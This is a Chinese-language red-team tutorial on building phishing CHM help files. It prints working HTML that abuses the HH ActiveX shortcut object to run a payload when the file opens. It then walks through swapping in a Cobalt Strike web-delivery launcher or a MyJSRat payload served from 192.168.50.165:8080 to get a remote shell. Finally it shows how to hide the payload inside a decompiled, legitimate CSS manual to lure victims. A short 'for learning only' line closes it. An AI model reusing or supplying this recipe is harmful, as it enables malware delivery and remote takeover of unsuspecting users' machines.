制作chm 手册_红队攻防之CHM文档钓鱼

0x00 CHM简单介绍

CHM(Compiled Help Manual)即“已编译的帮助文件”。它是微软新一代的帮助文件格式，利用HTML作源文，把帮助内容以类似数据库的形式编译储存。因为使用方容便，形式多样也常被采用作为电子书的格式。而该类型的文件是可以用Windows自带的hh.exe文件来进行打开。

0x01 准备工具及流程

准备工具：EasyCHM、Cobalt Strike、MyJSRat 钓鱼流程：制作html -> 制作chm文件 -> 伪装 -> 打开chm上线

0x02 CHM钓鱼文件制作过程

1. 创建个空文件夹

此处叫test

2. 创建html

html源码：

<html><head><title>Mousejack replaytitle>head><body>command exec <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"><PARAM name="Button" value="Bitmap::shortcut"><PARAM name="Item1" value=',payload'><PARAM name="Item2" value="273,1,1">OBJECT><SCRIPT>x.Click();SCRIPT>body>html>

注意：",payload" 此处前面需要加个英文版的逗号，否则在打开chm文档时会出错。 此处打开文档执行的calc，也就是我们的计算器

3. Easy CHM制作CHM文档

3.1 新建工程 选择我们创建的那个test文件夹 3.2 点击编译 -> 生成CHM

4. 制作完成

双击打开看看效果 打开弹出计算机

0x03 Cobalt Strike制作木马+chm上线

启动Cobalt Strike，点击attacks——>web Drive by——>scripted web Delivery 设置好监听选择Launch 全部复制下来，替换payload 注意：exe后面要再加一个英文版逗号否则无法执行exe，再是注意生成出来的payload字符串的双引号跟单引号的冲突。 再重新生成，再打开 看看上线结果

0x04 MyJSRat配合chm进行上线

MyJSRat下载地址：https://github.com/Ridter/MyJSRat 先克隆下来 Python2 运行 下面那条命令

python2 MyJSRat.py -i 192.168.50.165 -p 8080

注：用kali linux环境运行。 然后访问下 url  http://192.168.50.165:8080/wtf 复制下来这一串，替换payload 记得加上逗号， 接下来老规矩，制作chm。 双击上线，执行个whoami命令

0x05 CHM内容伪装

1. 先拿一个正常chm文档内容，转成html

2. 通过hh命令转成html

hh -decompile .\\html CSS2.0中文手册.chm

就会出来一个html文件夹，内容存放在css2中

3. 钓鱼html payload复制修改，嵌入到css2 c_color.html文件中

4. 制作chm钓鱼文档

工程目录选择css2 编译即可 设置好监听，双击运行 注意：此处一定要用户点击到c_color.html这个模块才行，所以内容得吸引人(此处自由发挥想象) 上线结果

0x06 总结

注意：此处没做免杀，后期更新免杀内容。 缺点：打开时会出现一闪而过弹黑框以及卡顿，容易被察觉(看防范意识)。此处工具以及文档公众号 回复0001进行下载。

内容仅供学习和 参考